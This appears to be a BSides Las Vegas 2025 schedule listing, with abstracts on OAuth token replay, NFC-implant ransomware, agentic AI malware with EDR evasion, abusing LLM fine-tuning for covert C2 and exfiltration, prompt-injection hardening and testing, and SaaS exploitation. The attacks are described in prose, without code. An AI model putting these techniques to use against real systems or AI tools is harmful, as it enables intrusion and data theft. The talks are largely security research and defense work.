OAuth 2.0 and OpenID Connect (OIDC) are the identity workhorses of the modern web, enabling SSO, delegated authorization, and secure API access across cloud and enterprise ecosystems. But despite their widespread adoption, these protocols are frequently misconfigured — and attackers are capitalizing on it. This talk exposes how real-world flaws in OAuth and OIDC implementations can be exploited to bypass authentication, impersonate users, and perform full session hijacking via token replay. This presentation is designed for security professionals, penetration testers, red teamers, and identity architects who want a deeper technical understanding of identity-layer attack surface and how it’s routinely exploited in the wild. It opens with a fast-paced breakdown of how OAuth and OIDC are supposed to work, then dives headfirst into where they typically fail — not in the protocols themselves, but in how they’re implemented. Attendees will learn how missing or improperly validated state parameters lead to CSRF, how weak or wildcarded redirect_uri values open the door for open redirect exploits, and why implicit flows are dangerous in modern environments. On the OIDC side, we’ll explore how attackers tamper with the discovery endpoint (.well-known/openid-configuration), and how improperly validated ID tokens lacking issuer, audience, or nonce verification can be forged and replayed. The centerpiece of the session is a live demonstration of a token replay attack using OWASP ZAP. We’ll walk through a simulated login against a vulnerable OAuth/OIDC web app, intercept a valid JWT using ZAP, and replay that token from another client to gain unauthorized access. This real-time attack sequence shows just how quickly identity misconfigurations can be turned into full session compromise — especially when token binding and validation safeguards are missing. Following the attack demonstration, we’ll pivot to practical defensive strategies including: -Best practices for validating ID tokens (issuer, audience, nonce, exp) -Enforcing short token lifetimes and secure refresh mechanisms -Implementing token binding using device fingerprinting, IP correlation, or advanced options like DPoP and mTLS -Integrating detection strategies via ITDR platforms or behavioral monitoring To support continued learning, the presentation includes access to an open-source lab environment built around OWASP ZAP. The lab includes three modular ZAP script sets: Script Set 1: Hardcoded JWT replay automation Script Set 2: Dynamic token capture and replay via scripted login Script Set 3: Docker-based ZAP automation for CI/CD pipelines This session bridges the gap between protocol theory and real-world identity exploitation, showing how small implementation gaps can have catastrophic security consequences. Attendees will leave with working examples, reusable tools, and a detailed understanding of how to defend against identity-based attacks that bypass traditional perimeter defenses. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/HUP7L3/ Florentine E Darryl G. Baker PUBLISH ZRBTVS@@pretalx.com -ZRBTVS Locking Hands: Ransomware Meets Bioimplants en en 20250804T100000 20250804T104500 004500

Locking Hands: Ransomware Meets Bioimplants

Bioimplants like NFC chips unlock new possibilities for personal augmentation, but they also introduce unique security challenges. In this talk, we present LockSkin, the first educational ransomware designed specifically for NFC bioimplants. LockSkin adds a ransom note and secret key to the implant, leaving the user locked out of their own device. Through this hands-on experiment, we’ll explore the implications of bioimplant security, the mechanics of LockSkin, and what this means for the future of biohacking. Are you going to open that door? Grab that mic? Think twice. Because sometimes, ransomware really does get under your skin. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/ZRBTVS/ Florentine F Mauro Eldritch / Heiner García Pérez PUBLISH RESSKA@@pretalx.com -RESSKA So You Want to Give A Talk: How to Write a CFP en en 20250804T110000 20250804T112000 002000

So You Want to Give A Talk: How to Write a CFP

Wow, we let people potentially put in 8,000 words here? That like 16 pages! Anyway, this is a talk I've given locally here in San Diego a few times and its been well recieved, i walk through the various sections of a CFP and how to fill them out, in a fun, lighthearted talk. The intent of this talk is to help newbies and the elite alike submit better CFPs. Also I noticed that last time BsidesLV had a CFP talk it was a panel from 2016. PUBLIC CONFIRMED Talk-20m https://pretalx.com/security-bsides-las-vegas-2025/talk/RESSKA/ Florentine F Phil "Soldier of FORTRAN" Young PUBLISH TJMRAK@@pretalx.com -TJMRAK Agentic AI Malware: Why the Cybersecurity Battle Isn’t Over en en 20250804T140000 20250804T144500 004500

Agentic AI Malware: Why the Cybersecurity Battle Isn’t Over

This talk will showcase an agentic AI agent demo that I created. The first version was built using Perplexity's Sonar reasoning pro model, with an updated version leveraging OpenAI's Responses API. I will walk through each step and feature in detail, analyzing its effectiveness, potential benefits for attackers, implementation challenges, and whether it makes detection harder for defenders. Key topics will include: Metamorphic code rewriting with LLMs, autonomous reasoning-based strategy selection to achieve goals such as stealing sensitive files, exfiltration via LLMs, and EDR evasion techniques. The goal of this talk is to demonstrate what is realistically possible while cutting through media hype and misconceptions about so-called "unlockable" agentic AI malware. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/TJMRAK/ Florentine F Candid Wuest PUBLISH HA8P8U@@pretalx.com -HA8P8U When the Breach Hits the Fan: Understanding Cyber Insurance en en 20250804T150000 20250804T154500 004500

When the Breach Hits the Fan: Understanding Cyber Insurance

There are so many questions and concerns in the cybersecurity community about cyber insurance, how it works, why are there exclusions, how do we improve our rates, etc. Even learning about what benefits insurance has for you is something that is a great value. So really laying out what the heck cyber insurance is, what it does and doesn't cover, how it can be a boon and benefit, and tips on how organizations should best engage and work with their insurance providers and brokers. Highlighted in the conversation is especially facts about how the claims process helps in some of the major challenges during a ransomware attack, how it can save you money during an incident, and assist with navigating coverage of 3rd party incidents too. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/HA8P8U/ Florentine F Mea Clift PUBLISH D8QXVT@@pretalx.com -D8QXVT When Attackers Tune In: Weaponizing LLM Tuning for Stealthy C2 and Exfiltration en en 20250804T170000 002000

When Attackers Tune In: Weaponizing LLM Tuning for Stealthy C2 and Exfiltration

In this presentation we will share a proof of concept we developed, originally as part of a data exfiltration focused research project held in Palo Alto’s Cortex TI team. As we mapped the landscape we found that Large Language Models (LLMs) are increasingly leveraged by attackers for automation, phishing, and malware development, but their true offensive potential remains largely untapped. In this talk, we explore a novel technique: abusing the fine-tuning process of LLMs to establish a covert C2 channel and exfiltrate sensitive data. Unlike traditional AI abuses that focus on prompt engineering or model manipulation, this approach enables adversaries to embed and retrieve information through the fine-tuning mechanism, bypassing common security measures. At first glance, using LLMs for covert communication seems impractical due to security controls, session-based memory limitations, and unpredictable model behavior. However, by fine-tuning a widely used model, we successfully created a reliable attack method where a victim unknowingly trains an LLM with sensitive data, allowing an attacker to extract this data and issue commands remotely. We will showcase our PoC, highlighting key technical challenges such as AI hallucinations, consistency issues, and response unpredictability—along with the techniques we used to overcome them. From a defender’s perspective, detecting this attack is quite challenging. Traditional security solutions, such as EDRs and network monitoring tools, do not effectively track AI interactions, allowing malicious activity to blend in with legitimate AI usage. We will analyze why conventional detection methods fail and discuss potential mitigation strategies, including behavioral anomaly detection. This talk provides an in-depth look at the risks associated with LLM fine-tuning and its implications for security. Through a pre-recorded demonstration, we will illustrate how attackers can use AI-powered C2 channels in real-world scenarios. As AI continues to evolve, understanding and securing its hidden attack surfaces is critical—before adversaries fully "tune in" to these emerging opportunities. PUBLIC CONFIRMED Talk-20m https://pretalx.com/security-bsides-las-vegas-2025/talk/D8QXVT/ Florentine F Noa Dekel PUBLISH L7GJCM@@pretalx.com -L7GJCM Risk it for the Biscuit: Crunching the Numbers on Cyber Threats en en 20250804T173000 20250804T175000 002000

Risk it for the Biscuit: Crunching the Numbers on Cyber Threats

In this talk I discuss how little the latest zero day or the biggest CVSS’ are exploited, highlighting the largest cybersecurity incidents of the past year which are often rooted in simple misconfigurations, lack of MFA, or other supposedly minor uninteresting issues. Focus on how to build a quick threat model of a company, how attacks originate, pivot, and affect companies. Highlighting how attackers typically have a goal rather than just wanting to exploit a specific weakness: extortion (ransomware), data exfiltration, defacement, ect. I build on that by demonstrating how to take a new CVSS and threat model its applicability to your organization based on your larger scale threat model. For example do you use this vulnerable software but there are already protections in place? If so you might want to prioritize updating this software below your rollout of MFA, or a minor vulnerability that doesn’t have protections in place. PUBLIC CONFIRMED Talk-20m https://pretalx.com/security-bsides-las-vegas-2025/talk/L7GJCM/ Florentine F Sean "4dw@r3" Juroviesky PUBLISH FC7TDL@@pretalx.com -FC7TDL From interview questions to cluster damage: Adventures in k8s cluster shenanigans en en 20250804T180000 20250804T184500 004500

From interview questions to cluster damage: Adventures in k8s cluster shenanigans

From Interview Questions to Cluster Damage: Adventures in k8s Cluster Hacking It all started with a simple task - creating technical interview questions for Kubernetes researchers. You know the type: "What happens if this pod can't schedule?" or "How would you debug a failing service?" But as we brainstormed scenarios, we kept having these "hold up, what if..." moments that led us down some interesting paths. We started testing our theories in lab environments, and what we found was both interesting and kind of amusing. Turns out there are quite a few ways to mess with a Kubernetes cluster that don't require sophisticated zero-day exploits - just creative use of normal cluster operations. In this talk, we'll share three main insights from our accidental research project. First, we'll look at some surprisingly effective ways to disrupt cluster operations through resource manipulation and component misconfigurations. These aren't complex attacks - they're the kind of things that could happen by accident if you're not paying attention. We'll then explore how attackers might map out a cluster starting with limited access. Understanding this helps both with security testing and knowing what to watch out for in your monitoring. Finally, we'll tackle a classic interview question that turned out to be more interesting than we expected: if someone compromises a node, can they take over the whole cluster? This isn't going to be a standard lecture - we want to hear your thoughts and experiences too. We'll show some live demos and turn key points into discussions. After all, the best security insights often come from comparing notes with other practitioners. The talk is aimed at folks who work with Kubernetes regularly - security engineers, DevSecOps teams, platform engineers. You don't need to be a security expert, but you should be familiar with basic Kubernetes concepts. We'll focus on practical stuff you can actually use, not theoretical edge cases. By the end, you'll have: * Some new perspectives on cluster security * Practical ideas for hardening your environments * Better understanding of what to monitor * Some good material for your own interview questions PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/FC7TDL/ Florentine F Travis Lowe Amit Serper PUBLISH WBYUUP@@pretalx.com -WBYUUP Detect and Respond? Cool Story — or Just Don’t Let the Bad Stuff Start. en en 20250804T100000 20250804T102500 002500

Detect and Respond? Cool Story — or Just Don’t Let the Bad Stuff Start.

Many teams still treat Kubernetes security like a post-deployment problem: detection tools, dashboards, and alert fatigue. But the most common threats — containers running as root, unrestricted installs, exposed host paths — start earlier, in the pod spec. By the time you're reacting, it's already too late. This talk presents a hands-on alternative. Using a controlled Kubernetes environment, we’ll demonstrate how Kyverno and KubeArmor — two well-supported open source tools — can block insecure workloads before they run and prevent malicious behavior during runtime. Kyverno enforces policy at admission, stopping bad configurations before they reach the cluster. KubeArmor applies system-level controls after the container starts, closing Time-of-Check to Time-of-Use (TOCTOU) gaps that traditional tools miss. Together, they prevent the kinds of activity that detection tools only alert on — after exploitation has already begun. These aren’t abstract controls. They work today, in real clusters, with policies defined in human-readable YAML and managed in Git — no rewrites, no platform overhaul. **This talk covers:** - Why “detection as protection” doesn’t hold up - What runtime security really looks like in Kubernetes - How public containers and default chart configs quietly open the door - How Kyverno and KubeArmor make actual enforcement simple and scalable This talk assumes light Kubernetes familiarity and is designed to equip, not overwhelm. Kyverno and KubeArmor aren’t the full solution, but they fill the enforcement gap that often gets ignored. PUBLIC CONFIRMED Proving Ground Talk-25m https://pretalx.com/security-bsides-las-vegas-2025/talk/WBYUUP/ Firenze Jimmy Shah Matthew Brown PUBLISH BANTPJ@@pretalx.com -BANTPJ I Didn’t Register for This: What’s Really in Google’s Artifact Registry? en en 20250804T103000 20250804T105500 002500

I Didn’t Register for This: What’s Really in Google’s Artifact Registry?

The Artifact Registry is the go-to solution for hosting container images in GCP. It is widely adopted by customers for storing and managing images, but Google itself uses it for hosting and managing many container images as well. The images managed by Google can be split into three categories: Public Images offered by Google for its users' convenience, images by third-party companies vetted and uploaded by Google to the cloud marketplace, and Google production images used in actual GCP services. All three categories carry significant trust from Google to its users, raising the question - how secure are they, really? To find out, we decided to dive into some research and test any images we could find across these categories. Some of these Google-managed images are not documented or meant for public use, despite having read permissions for all GCP users - making their discovery complex. We were able to utilize and develop several techniques for discovering and scanning these images for security issues, which enabled us to find and scan thousands of images. Google claims in its documentation that it vets and checks the container images for vulnerabilities, but the results show otherwise. Many actively maintained images across all three categories contained outdated software with critical vulnerabilities, including some of the most infamous and exploited in the wild. In addition to the vulnerabilities, we discovered plain-text secrets and credentials to key services, cloud providers, and APIs. In this talk, we will explore some of the questions these issues raise while walking the audience through our process of revealing and analyzing the images: What is the severity of the issues we found, and what is the actual risk they pose to GCP users? Is it Google's responsibility to ensure the safety of the products in its marketplace? We will conclude by equipping GCP users with best practices to protect themselves and mitigate these issues in their environment. PUBLIC CONFIRMED Proving Ground Talk-25m https://pretalx.com/security-bsides-las-vegas-2025/talk/BANTPJ/ Firenze Lenin Alevski Moshe Bernstein PUBLISH DWYE8M@@pretalx.com -DWYE8M SOC Like a Genius: Cognitive Agents Delivering Wisdom at Scale en en 20250804T110000 20250804T112500 002500

SOC Like a Genius: Cognitive Agents Delivering Wisdom at Scale

We introduce an agent-based detection framework that uses top-down reasoning and contextual understanding-powered by SLM/LLMs-to go beyond static correlation and entity matching. Each AI agent is designed for a specific role in the detection lifecycle, forming a modular pipeline that improves accuracy, prioritization, and automation. This is a new approach in applying cognitive AI to SOC workflows and brings reasoning, intent analysis, and wisdom-driven decisions to detection and response. It solves alert fatigue, missed and false correlations, schema dependency, and the inefficiencies of static rules. Traditional correlation engines can't scale across multi-domain, multi-vendor, cross-entity threats or adapt fast enough. This framework gives SOCs the ability to reason about alerts, hypothesize links, and prioritize actions-reducing noise, improving detection coverage, and enabling faster responses. PUBLIC CONFIRMED Proving Ground Talk-25m https://pretalx.com/security-bsides-las-vegas-2025/talk/DWYE8M/ Firenze Sarah Young Oudy Even Haim PUBLISH 7ZBBAZ@@pretalx.com -7ZBBAZ Innovative, Shiny, and Vulnerable: Four Ways to Exploit Modern SaaS Data Platforms en en 20250804T140000 20250804T142500 002500

Innovative, Shiny, and Vulnerable: Four Ways to Exploit Modern SaaS Data Platforms

This talk will discuss four common vulnerabilities in some of the products I have tested that can fit the "SaaS data platform" description. I identified these vulnerabilities in various data analytics, AI data/feature engineering, and customer data platforms as part of penetration tests performed on behalf of my employer, Praetorian (https://praetorian.com). The names of these products will be abstracted to protect their reputation. An overview of the four issues I will discuss is as follows: 1) Control-Plane Access Control Gaps: This category refers to access control vulnerabilities in the product's web UI, API, SDK, or any other interface that customers can use to view or modify their account and configuration. Standard vulnerabilities like Insecure Direct Object Reference (IDOR), insufficient authorization, and overly permissive user roles in the application's RBAC model can lead to unauthorized disclosure of data within an organization's tenant or across customers. Additionally, some platforms provide free demo accounts that users can self-sign up for without restricting or isolating them, exposing the product and all their customers' data to a broader attack surface. 2) Remote Code Execution as a Service (RCEaaS): Many of these platforms provide custom logic and algorithm execution as part of their Extract, Transform, and Load (ETL) capabilities. While they take steps to lock down this functionality, the protections can often be bypassed since the code execution usually uses high-level languages like JavaScript and Python, and accounting for every sandbox escape is nearly impossible. After an attacker exploits these features, they can access the platform's data plane and move laterally within that environment, leading to the third issue. 3) Data-Plane Access Control Gaps: Start-ups and other lean companies usually build these platforms in public cloud infrastructure since it is more cost-effective. Most of the platforms I tested had issues with their deployment architecture. One of these would be over-privileged principals, like the compute instances running customer jobs. An attacker who gains access to the cloud infrastructure by exploiting the code execution features could retrieve the credentials provided to the compute layer and access other resources like storage or secrets. Log files containing sensitive data like access tokens or API keys were often written to the instance file system or cloud storage. An attacker could use the secrets to perform horizontal privilege escalation to other customer tenants or vertical privilege escalation within the tenant. Cross-tenant data leakage is a concern if the data planes between customers are not sufficiently isolated, such as by using distinct cloud accounts. 4) Highly Scalable Architecture: Many data platforms use serverless technology like AWS Lambda to process data and implement user-defined logic. This infrastructure can quickly scale to millions of requests. If the platform does not enforce strict rate-limiting or logic checks on an experimental user or malicious actor, the number of jobs may spiral out of control. The platform's cloud bill could skyrocket, and if the customer eats the cost, that business could be lost and the platform's reputation damaged due to accidental resource over-consumption. Even more interesting than a fat bill is the potential for weaponizing the platform's traffic generation into denial-of-service attacks on arbitrary targets, as I demonstrated in a Praetorian blog post called "Recursive Amplification Attacks: Botnet-as-a-Service," seen here: https://www.praetorian.com/blog/recursive-amplification-attacks-botnet-as-a-service/ There will not be any live demos during the presentation due to the amount of content to be discussed in the time allotted. However, every technical concept, vulnerability, or hacking technique will be explained with a simple and concise visual example. PUBLIC CONFIRMED Proving Ground Talk-25m https://pretalx.com/security-bsides-las-vegas-2025/talk/7ZBBAZ/ Firenze Ben Kofman Ali Kabeel PUBLISH BHMKYS@@pretalx.com -BHMKYS Prompt Hardener - Automatically Evaluating and Securing LLM System Prompts en en 20250804T150000 20250804T152500 002500

Prompt Hardener - Automatically Evaluating and Securing LLM System Prompts

As LLMs become foundational components of modern applications, prompt security has emerged as a critical concern. Developers often rely on handcrafted system prompts without testing how they behave under adversarial conditions. While multiple techniques exist to harden prompts as part of a layered defense strategy, there is no unified way to apply and evaluate them systematically. **Prompt Hardener** addresses this by automating both **refinement** and **validation** of system prompts. Using the LLM itself, it performs structured evaluations based on predefined criteria and applies improvements using layered security strategies: - **Spotlighting**: Explicitly marks and isolates all user-controlled input using tags and special characters to prevent injection - **Random Sequence Enclosure**: Encloses trusted system instructions in unpredictable tags, ensuring only those are followed and not leaked - **Instruction Defense**: Instructs the model to ignore new instructions, persona switching, or attempts to reveal/modify system prompts - **Role Consistency**: Ensures each message role (system, user, assistant) is preserved and not mixed, preventing role confusion attacks You can check the details of each hardening techniques from [here](https://github.com/cybozu/prompt-hardener/blob/main/docs/techniques.md). After hardening, the tool performs **automated injection testing** with a corpus of categorized payloads that simulate common attack scenarios. These include prompt leaking, improper output handling, tool enumeration, and function call hijacking. These are basically based on [OWASP Top 10 for LLM Applications 2025](https://genai.owasp.org/resource/owasp-top-10-for-llm-applications-2025/ ) but also including other modern attacks. The results are summarized in JSON and visualized in HTML reports, making it easy for LLM application developers and security engineer to measure resilience. You can check the examples of using Prompt Hardener to improve and test various system prompts from [here](https://github.com/cybozu/prompt-hardener/blob/main/docs/tutorials.md ). A simple Gradio UI allows non CLI users to access the full pipeline: input prompts, evaluate and harden them, and run attack simulations with just a few types and clicks. By the end of this talk, attendees will understand how to: - Identify prompt weaknesses before deployment - Apply defense-in-depth techniques to prompts - Validate the effectiveness of defenses with attack simulations - Integrate prompt security testing into their CI pipelines or red team workflows GitHub URL: https://github.com/cybozu/prompt-hardener PUBLIC CONFIRMED Proving Ground Talk-25m https://pretalx.com/security-bsides-las-vegas-2025/talk/BHMKYS/ Firenze Krity Kharbanda Junki Yuasa Yoshiki Kitamura PUBLISH BAHK8E@@pretalx.com -BAHK8E Community Defense in Depth: Teaching digital security and privacy practices for the public good en en 20250804T153000 20250804T155500 002500

Community Defense in Depth: Teaching digital security and privacy practices for the public good

I've developed this talk over the past year, based on my experiences volunteering as a digital security trainer to activists, journalists and other people involved in the human rights space. The audience will learn how to educate the public in a world where privacy laws can change overnight. PUBLIC CONFIRMED Proving Ground Talk-25m https://pretalx.com/security-bsides-las-vegas-2025/talk/BAHK8E/ Firenze Lidia Giuliano Melanie Gonzalez PUBLISH 8XRRGH@@pretalx.com -8XRRGH Azazel System: Tactical Delaying Action via the Cyber-Scapegoat Gateway en en 20250804T170000 20250804T172500 002500

Azazel System: Tactical Delaying Action via the Cyber-Scapegoat Gateway

### **1. Introduction** Modern cybersecurity defense must move beyond passive monitoring and immediate attack blocking. Attackers are increasingly using automated tools that quickly scan, exploit, and establish persistence within seconds. **Traditional honeypots collect attack data but do not interfere with or slow down adversaries. Decoy servers mislead attackers but do not impact their decision-making time.** This presentation introduces **Azazel System**, a **portable, low-cost cyber deception gateway that incorporates tactical delaying actions** to provide an effective response against real-world cyber threats. **By leveraging the concept of cyber-scapegoating, the system not only misdirects attackers but actively slows them down using real-time intervention techniques.** Built on **Raspberry Pi 5 (8GB) with a hybrid architecture**, Azazel System employs: - **Real-time traffic manipulation** using `tc` (Traffic Control) and `iptables` - **Cyber-scapegoat deception** to absorb and delay attacks rather than just observing them - **Automated logging and threat classification** using Fluent Bit and MITRE ATT&CK - **Integration with public Wi-Fi and untrusted network environments**, ensuring adaptability for diverse deployment scenarios This talk will explore the **design, deployment, and defensive applications** of this **portable security gateway**, demonstrating its **effectiveness in delaying attacks while providing defenders with essential response time**. --- ### **2. Tactical Delaying Action in Cybersecurity** #### **2.1. Military Delaying Action: A Defensive Strategy** In military land warfare, **delaying actions** are used to **slow enemy forces, disrupt their movements, and create opportunities for counterattacks**. These tactics include: - **Strategic withdrawal while applying resistance** to force attackers into resource exhaustion - **Obstacle deployment to manipulate enemy pathways** - **Diversionary targets to redirect enemy focus** Azazel System applies these principles to cybersecurity by **deliberately controlling an attacker's progress, rather than merely blocking access**. --- ### **3. The Cyber-Scapegoat Model: Beyond Traditional Honeypots** **Problem:** Previous deception techniques fail to **actively interfere with an attacker’s workflow**. **Solution:** Cyber-scapegoats **absorb attacks and delay adversaries, increasing their operational fatigue**. | **Method** | **Honeypots** | **Decoy Servers** | **Cyber-Scapegoat (Azazel System)** | |-----------|--------------|------------------|----------------------------| | **Purpose** | Collect attack data | Misdirect attackers | **Actively delay and disrupt attacks** | | **Impact on Attackers** | No direct interaction | Passive deception | **Manipulates and slows adversaries** | | **Operational Outcome** | Intelligence gathering | Temporary misdirection | **Fatigue attackers and buy defender response time** | Unlike traditional deception models, Azazel System **exploits attacker persistence by prolonging their engagement with non-critical assets**. --- ### **4. Hybrid Architecture and Deployment** 📌 **Challenge:** Running **active deception and tactical delay mechanisms** on resource-limited hardware. 📌 **Solution:** A **hybrid system** that offloads deep attack analysis to an external laptop. #### **4.1. System Overview** 📌 **Azazel System operates as a portable gateway, intercepting and delaying attacks before they reach critical assets.** 🔹 **Key Components:** - **Raspberry Pi 5 (8GB) as the core gateway** - **Containerized OpenCanary for deception** - **Real-time network manipulation with `tc` and `iptables`** - **Automated log forwarding via Fluent Bit** - **External laptop for in-depth forensic analysis** 🔹 **Deployment Use Cases:** - **Security for public Wi-Fi and travel networks** - **SOC (Security Operations Center) incident response augmentation** - **Cyberwarfare research and adversary behavior modeling** --- ### **5. Implementation and Attack Mitigation Techniques** 📌 **Azazel System actively intervenes in attack processes rather than just logging them.** #### **5.1. Network Delay & Redirection** 📌 **Key Mechanism:** Slow down reconnaissance and exploit attempts using dynamic network manipulation. 🔹 **Methods Used:** - **`tc` to artificially increase latency in suspicious connections** - **`iptables` rules to reroute attackers into deception environments** - **Adaptive response, progressively increasing delays on persistent threats** #### **5.2. Logging, Threat Classification, and MITRE ATT&CK Integration** 📌 **Key Mechanism:** **Suricata intrusion alerts** processed via Fluent Bit and classified using MITRE ATT&CK. 🔹 **How It Works:** - **Suricata detects unusual network activity.** - **Fluent Bit sends logs to an external laptop.** - **Kibana visualizes the attack timeline, mapped to MITRE ATT&CK.** --- ### **6. Key Benefits and Tactical Advantages** 📌 **Azazel System offers advantages beyond traditional deception techniques:** 🔹 **Delaying attackers to increase defensive response time** 🔹 **Cyber-scapegoat model actively manipulates adversary behavior** 🔹 **Lightweight, portable deployment suitable for high-risk environments** 🔹 **OSS-based, making it cost-effective and adaptable** PUBLIC CONFIRMED Proving Ground Talk-25m https://pretalx.com/security-bsides-las-vegas-2025/talk/8XRRGH/ Firenze Soya Aoyama Makoto Sugita PUBLISH 8QHF9R@@pretalx.com -8QHF9R The Perfect BLEnd: Reverse engineering a bluetooth controlled blender for better smoothies en en 20250804T173000 20250804T175500 002500

The Perfect BLEnd: Reverse engineering a bluetooth controlled blender for better smoothies

This is a hobby project (not work related) where I've been poking at a Nutribullet Smart Balance blender on and off for several years. Late last summer I finally got around to pulling together the notes I had on the different parts of the BLE (bluetooth low energy) protocol for controlling the blender and put the pieces together to create an open source web app using WebBluetooth for controlling the blender. Using a variety of tools (listed below), I'll step go through the process I followed in learning to sniff bluetooth communications and how bluetooth low energy works. This will include my initial attempts using an nRF52 devkit prior to leveraging bluetooth logging features included in smart phones (and laptops). If there is time, a brief peek at decompiling the Android app revealed blenders and smart scales from other companies that might share the same protocol and could be future devices to look at. Tools: * nRF52 DevKit * WireShark * Variety of free BLE scanner apps * PacketLogger (free tool included with Xcode utilities) * libimobiledevice idevicebtlogger (open source alternative to PacketLogger) * https://github.com/nightlark/nutribullet (WebBluetooth app developed based on findings) PUBLIC CONFIRMED Proving Ground Talk-25m https://pretalx.com/security-bsides-las-vegas-2025/talk/8QHF9R/ Firenze Edward Farrell Ryan Mast PUBLISH LDTD3E@@pretalx.com -LDTD3E RAGnarok: Assisting Your Threat Hunting with Local LLM en en 20250804T180000 20250804T182500 002500

RAGnarok: Assisting Your Threat Hunting with Local LLM

RAGnarok is an assisting tool for the threat hunting process with a local Large Language Model (LLM). It can generate a Sigma rule automatically for a specific attack technique based on threat intelligence like MITRE ATT&CK. In this talk, I will explain the architecture of RAGnarok, then elaborate on the technologies implemented. Also, I will provide a pre-recorded demo for a better understanding of RAGnarok. And finally, some know-hows and tips obtained from developing RAGnarok will be covered. This talk has been developed based on my experience. When I was involved in threat hunting, there were many different procedures and approaches for it, and I felt it was too much for beginners. On the other hand, threat hunting also has many monotonous operations, and it can easily become boring. My motivation for developing RAGnarok is to automate the threat hunting process with local LLM, especially boring processes, and concentrate on only interesting processes. In other words, humans will focus on only the advanced steps in the threat hunting process. Additionally, assisting beginners by generating practical results (Sigma rules) is also my motivation. Threat hunting usually requires environment information such as server configuration or account information. In this talk, Windows Active Directory configuration is especially focused on as environmental information, and collected and manipulated by using "Bloodhound". These types of environmental information are often regarded as confidential information, so RAGnarok adopts a local LLM instead of a cloud-based LLM in order to avoid uploading the information to the Internet. The base technologies of RAGnarok are "Quantized LLM", "Retrieval-Augmented Generation (RAG)", and "Multi-Agent System". Combining them enables RAGnarok to generate highly professional and accurate results without fine-tuning on CPU only machine. However, there are a lot of misunderstandings in using these LLM-related technologies because of their complexity. Therefore, this talk will provide not only the technical details of RAGnarok, but also the points of utilizing LLM especially local LLM as know-how or tips. Furthermore, one of the concepts behind RAGnarok is scalability. Of course, we can easily add a new feature to RAGnarok. But it also means that the architecture of RAGnarok is applicable to other areas of cybersecurity, such as red teaming. In other words, threat hunting is just one of the use cases of the proposed architecture. I believe that this talk can contribute to promoting the use of a local LLM in the whole cybersecurity field. RAGnarok is going to be available as open source by the time of the talk. Tools: - Docker: https://www.docker.com/ - Bloodhound-CE: https://github.com/SpecterOps/BloodHound - Langgraph: https://www.langchain.com/langgraph - Ollama: https://ollama.com/ The following presentation is the prototype of RAGnarok. Of course, as RAGnarok has been evolved from the prototype, they are not the same. For example, there are some differences in architecture and function related to treating environmental information. (I will elaborate on them in the talk.) But this presentation will help you imagine what RAGnarok is all about! - Presentation record: https://www.youtube.com/watch?v=a0FvmNkpVLI&list=PLALq3Th79NnpPtZ28R-WPbepAPwgYHYiz&index=5&pp=iAQB - Presentation material: https://ctid.mitre.org/events/apac-2025/08%20-%20MITRE%20ATT&CK%20Driven%20Threat%20Hunting%20Automated%20by%20Local%20LLM.pdf PUBLIC CONFIRMED Proving Ground Talk-25m https://pretalx.com/security-bsides-las-vegas-2025/talk/LDTD3E/ Firenze Cybelle Oliveira Jun Miura PUBLISH JWXSRB@@pretalx.com -JWXSRB SIGMA, one rule to find them all en en 20250804T183000 20250804T185500 002500

SIGMA, one rule to find them all

"The Gremlin Hunter" project was developed as a way to solve the challenges I had of searching in a consistent way, that could be tracked and then action that information to produce actionable intelligence. Together with my team, I developed a process modeled on a "guided" hunt framework, following the Intelligence Lifecycle. The hunts are developed using OSINT and internal research from our CTI team, which I use to put into the SIGMA rule format. I then inputted into our MISP instance, where we use pySIGMA to process and translate the rules. The rules are then sent over to our ticketing system where they are distributed weekly to the hunting team. The hunt team takes the queries that are translated and tests them in the environments, running them to hunt for whatever evil it is they are looking for. Final queries that are deemed production worthy are submitted to our engineering team to deploy as permanent detections. The training will include showing our guided hunt workflow setup as well as demonstrating the process I used to create a SIGMA rule to hunt for a particular threat or activity, as well as some tips and hints on how to overcome some of the challenges when writing rules. Avatar of Gremlin Hunter is art by Phil Cho https://www.philchoart.com/featured/2020/11/13/gizmo-gremlin-hunter-earth-27-commission PUBLIC CONFIRMED Proving Ground Talk-25m https://pretalx.com/security-bsides-las-vegas-2025/talk/JWXSRB/ Firenze HD Moore Rain Baker PUBLISH EKZ7ZD@@pretalx.com -EKZ7ZD I'm A Machine, And You Should Trust Me: The Future Of Non-Human Identity en en 20250804T100000 20250804T104500 004500

I'm A Machine, And You Should Trust Me: The Future Of Non-Human Identity

Security boils down to trust. Trusting that the code will do what is expected and is free from vulnerabilities. Trusting that the entities interacting with our data and resources have the right to access those resources. Our current approach to both human and non-human access uses the same basic flawed pattern: long-lived credentials. This approach to trusted access does not take into account who or what is requesting that resource. These secrets, which quite often leak, are an attacker's best friend and are how attackers think about getting into and moving throughout your system. What if instead of simply asking for a security key or credential to gain access, our applications, workloads, and resources asked "Who are you and how can you prove that?" Humans can move towards leveraging our non-changing characteristics, like biometrics. But what about machines? Especially in the world where pods and workloads last for only hours or days? Attend this session to: - Better communicate about why we must do things differently and soon - Learn how the open-source software community has looked at addressing the identity problem - Understand what commercial options are available - Map a path away from the world of long-lived credentials The future of identity and access management is the future of security, IT, and, ultimately, business resiliency. PUBLIC CONFIRMED Talk-45m https://pretalx.com/security-bsides-las-vegas-2025/talk/EKZ7ZD/ Tuscany Dwayne McDaniel PUBLISH P9MPCD@@pretalx.com -P9MPCD The Rise of Synthetic Passwords in Botnet & Attack Operations en en 20250804T110000 20250804T112000 002000

The Rise of Synthetic Passwords in Botnet & Attack Operations

